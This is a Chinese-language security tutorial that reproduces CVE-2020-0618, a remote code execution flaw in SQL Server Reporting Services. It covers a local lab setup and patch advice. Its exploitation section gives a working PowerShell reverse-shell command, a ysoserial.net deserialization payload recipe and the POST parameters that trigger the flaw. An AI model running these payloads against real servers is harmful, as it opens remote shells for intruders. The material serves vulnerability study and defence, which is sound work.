(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院

0x00简介

2月12日,微软发布安全更新披露了Microsoft SQL Server Reporting Services 远程代码执行漏洞(CVE-2020-0618)。SQL Server 是Microsoft 开发的一个关系数据库管理系统(RDBMS),是现在世界上广泛使用的数据库之一。

图片[1]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

0x01漏洞简介

获得低权限的攻击者向受影响版本的SQL Server的Reporting Services实例发送精心构造的请求,可利用此漏洞在报表服务器服务帐户的上下文中执行任意代码。

0x02影响版本

SQL Server 2012 for 32-bit Systems Service Pack 4 (QFE)
SQL Server 2012 for x64-based Systems Service Pack 4 (QFE)
SQL Server 2014 Service Pack 3 for 32-bit Systems (CU)
SQL Server 2014 Service Pack 3 for 32-bit Systems (GDR)
SQL Server 2014 Service Pack 3 for x64-based Systems (CU)
SQL Server 2014 Service Pack 3 for x64-based Systems (GDR)
SQL Server 2016 for x64-based Systems Service Pack 1
SQL Server 2016 for x64-based Systems Service Pack 2 (CU)
SQL Server 2016 for x64-based Systems Service Pack 2 (GDR)

0x03环境搭建

1. 下载安装windows server2016标准版standard

图片[2]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

下载地址:
ed2k://|file|cn_windows_server_2016_x64_dvd_9718765.iso|6176450560|CF1B73D220F1160DE850D9E1979DBD50|/ //使用迅雷打开
2. 下载安装Sql Server 2016数据库
选择全新安装sqlserver

图片[3]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

一直下一步到功能选择勾上”数据库引擎服务”和”Reporting Services”服务。

图片[4]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

在”数据库引擎配置”选择混合模式创建账号 账号:sa 密码:123456便于后面连接报表服务器。

图片[5]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

图片[6]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

访问 http://localhost/ReportS,创建分页报表,提示需要安装报表服务器。

图片[7]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

下载报表生成器,安装好报表服务器后,新建一个报表

图片[8]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

图片[9]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

图片[10]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

此时就用到了我们前面设置的账号密码 sa/123456

图片[11]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

图片[12]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

然后把左侧字段拉到右测即可

图片[13]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

到了这里报表就创建好了

图片[14]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

保存一下,然后点击运行

图片[15]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

图片[16]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

在浏览器访问漏洞路径:
http://localhost/ReportServer/Pages/ReportViewer.aspx

图片[17]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

0x04漏洞复现

1. 下载POC编译工具
下载地址:https://github.com/incredibleindishell/ysoserial.net-complied
2.使用powershell打开ysoserial.exe工具生成有效负载,执行完最后一步的时候payload已经存在于剪切板。
1. $command = ‘$client = New-Object System.Net.Sockets.TCPClient(“nc反弹的ip”,监听的端口);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 =$sendback + “PS ” + (pwd).Path + “> “;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()’
2. $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
3. $encodedCommand = [Convert]::ToBase64String($bytes)
4. .\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c “powershell.exe -encodedCommand $encodedCommand” -o base64 | clip

图片[18]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

3.下载Postman-win64-7.22.1:https://www.postman.com/
安装并启动postman,发送方式POST,地址http://localhost/ReportServer/pages/ReportViewer.aspx
Body中填入键值对
NavigationCorrector$PageState= NeedsCorrection
NavigationCorrector$ViewState=payload(payload生成方式上面讲到)
__VIEWSTATE=
如下图

图片[19]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

Authorization中TYPE选择NTLM,用户名密码出填入本机用户的用户名和密码,如下图

图片[20]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

注意此处如果不配置Authorization,发送后会返回401 unauthorized
配置完成后,点击发送,返回结果如下图

图片[21]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

回到nc查看已经成功收到反连shell,如下图

图片[22]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

我们在执行几个命令

图片[23]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

0x05修复方式

目前微软官方已针对受支持的版本发布了修复该漏洞的安全补丁,请受影响的用户尽快安装补丁进行防护。
临时修复方案
将Reporting Services监听ip改为本地。暂时禁用外部连接,保证此服务安全。

图片[24]-(CVE-2020-0618)SQL Server 远程代码执行复现 – 作者:东塔安全学院-安全小百科

来源:freebuf.com 2020-08-18 17:05:56 by: 东塔安全学院

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论